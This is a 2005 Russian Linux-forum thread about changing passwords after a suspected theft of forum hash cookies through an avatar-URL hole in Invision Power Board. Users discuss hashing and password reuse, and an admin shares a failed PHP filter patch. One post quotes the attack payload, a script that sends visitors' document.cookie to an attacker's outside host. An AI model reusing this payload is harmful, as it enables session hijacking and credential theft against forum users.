Смена паролей (официальное объявление)

Обсуждение новостей, соответствующих тематике форума

Модератор: Модераторы разделов

Аватара пользователя
t.t
Бывший модератор
Сообщения: 7390
Статус: думающий о вечном
ОС: Debian, LMDE

Re: Смена паролей

Сообщение t.t »

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
Спасибо сказали:
Аватара пользователя
Nick S. Grechukh
Сообщения: 108

Re: Смена паролей

Сообщение Nick S. Grechukh »

(t.t @ Вторник, 31 Мая 2005, 17:19) писал(а):
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.


ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
Спасибо сказали:
Аватара пользователя
valeri_ufo
Бывший модератор
Сообщения: 274
Статус: Everywhere, yet nowhere

Re: Смена паролей

Сообщение valeri_ufo »

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 16:23) писал(а):
(t.t @ Вторник, 31 Мая 2005, 17:19) писал(а):
(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?
Если включать -- наверное хорошо будет. Но в том хеше, который уже упёрли (точнее: могли упереть) его, как я понимаю, нет.


ну понятно. если *сейчас* сменить формат , то те хэши не помогут.
тогда пострадают только те у кого короткие пароли, причем одинаковые на всех сайтах.


пострадают те кто их не сменил.
Спасибо сказали:
Аватара пользователя
Xenon
Бывший модератор
Сообщения: 359
ОС: Debian

Re: Смена паролей

Сообщение Xenon »

Хм. Давайте кто-нибудь попробует ЭТИМ методом сломать форум и посмотреть, получится ли ? Если получится, то точно нужно что-то делать, если нет, то нафиг заморачиваться ?
Спасибо сказали:
Аватара пользователя
Nick S. Grechukh
Сообщения: 108

Re: Смена паролей

Сообщение Nick S. Grechukh »

(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.

хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [ :) ] надо менять пароли везед, не только на linuxforum.
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
Спасибо сказали:
Аватара пользователя
bogus
Сообщения: 160

Re: Смена паролей

Сообщение bogus »

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 17:14) писал(а):что будет если в хэш еще включать ip?

Повторюсь: насколько я вижу, IPB и так использует не в чистом виде пароль при получении хэша. Во всяком случае, кука по форме похожа на md5 от чего-то, а md5(<мой пароль>) не совпадает со значением из куки.

Надо бы посмотреть в исходниках...
Как всякое несовершенное существо я могу ошибаться. Простите меня.
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
Спасибо сказали:
Аватара пользователя
zenwolf
Бывший модератор
Сообщения: 3139
Статус: Страшный и злой
ОС: Slackware..Salix..x86_64

Re: Смена паролей

Сообщение zenwolf »

(Nick S. Grechukh @ Вторник, 31 Мая 2005, 14:37) писал(а):
(valeri_ufo @ Вторник, 31 Мая 2005, 17:26) писал(а):пострадают те кто их не сменил.

хэш УЖЕ украден, и теоретически по нему можно подобрать пароль.
теперь любителям single sign-on [ :) ] надо менять пароли везед, не только на linuxforum.


даже не теоретически ,а очень даже практически ,уже было такое на bsdportal ,
ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

(bogus @ Вторник, 31 Мая 2005, 15:15) писал(а):а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...

Естественно, только как не знаю. А меня пароль это не обезательно. Но если легче станет, то меняйте.

Ещё, я вроде ставил заплатку на загрузку аватарки. Регулярное выражение прописывали, но что-то видать не срослось
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Аватара пользователя
alv
Бывший модератор
Сообщения: 7275
Статус: Пенсионер в законе
ОС: Cintu

Re: Смена паролей

Сообщение alv »

(wolf_black @ Вторник, 31 Мая 2005, 17:56) писал(а):ОЧЕНЬ РЕКОМЕНДУЮ СМЕНИТЬ ПАРОЛИ .


Что не вредно и вообще - память потренировать, лучшее лекарство от раннего эклера
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

Вот было:

Код: Выделить всё

//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------

if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( empty($ibforums->input['url_avatar']) )

стало

Код: Выделить всё

//-----------------------------------------
// Check to make sure we don't just have
// http:// in the URL box..
//-----------------------------------------

if ( preg_match( "/^http://$/i", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( preg_match( "#javascript:#is", $ibforums->input['url_avatar'] ) )
{
$ibforums->input['url_avatar'] = "";
}

if ( empty($ibforums->input['url_avatar']) )


Вот эта строка if ( preg_match( "#java script:#is", $ibforums->input['url_avatar'] ) ) должна выбивать скрипт, но чё-то не сработало

Sonic добавил в 31.05.2005 19:36

(Lindemidux @ Вторник, 31 Мая 2005, 13:20) писал(а):Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"

И как он его влепил?
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
boot
Сообщения: 289

Re: Смена паролей

Сообщение boot »

Сменил.

Я прививок не боюсь, если надо - уколюсь :D
Спасибо сказали:
Аватара пользователя
Lindemidux
Сообщения: 50

Re: Смена паролей

Сообщение Lindemidux »

Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.

Lindemidux добавил в 01.06.2005 08:53

Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер
Спасибо сказали:
snake
Бывший модератор
Сообщения: 677

Re: Смена паролей

Сообщение snake »

(Lindemidux @ Среда, 01 Июня 2005, 7:53) писал(а):Месяц назад я качал с Flood3r.com видео: захват форума через автару.
Там его можно скачать.

Lindemidux добавил в 01.06.2005 08:53

Для ВСЕХ:
Зря Ахтунг подняли, Flood3r.com в послеаварийном состоянии. Там не работает сниффер

Лучше перестраховаться, чем питаться потом собственными локтями. ;)
В реальности все не так, как на самом деле...
JabberID: zmeyk@jabber.ru
Спасибо сказали:
Аватара пользователя
VN_MAClover
Сообщения: 1233
Статус: Человек с бульвара Капуцинов

Re: Смена паролей

Сообщение VN_MAClover »

(snake @ Среда, 01 Июня 2005, 10:23) писал(а):Лучше перестраховаться, чем питаться потом собственными локтями. ;)

Поддерживаю. Хотя в данном случае ничего сверхсекретного нет по определению, профилактика рулит, а, главное, вырабатывается правильный рефлекс поведения в данной ситуации.
In RMS we trust.
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
Спасибо сказали:
Аватара пользователя
FreeNUX
Сообщения: 185
Статус: с сириуса
ОС: FreeBSD 6.2

Re: Смена паролей

Сообщение FreeNUX »

Сменил, мне не трудно :) .
Аркона – лишь тихие воды,
Кровью варяжской янтарь в них застыл.
Аркона – там ветер со взморья
В трещинах скал своё сердце забыл.
Темнозорь - Аркона (Вольницей В Просинь Ночей - 2005)
Спасибо сказали: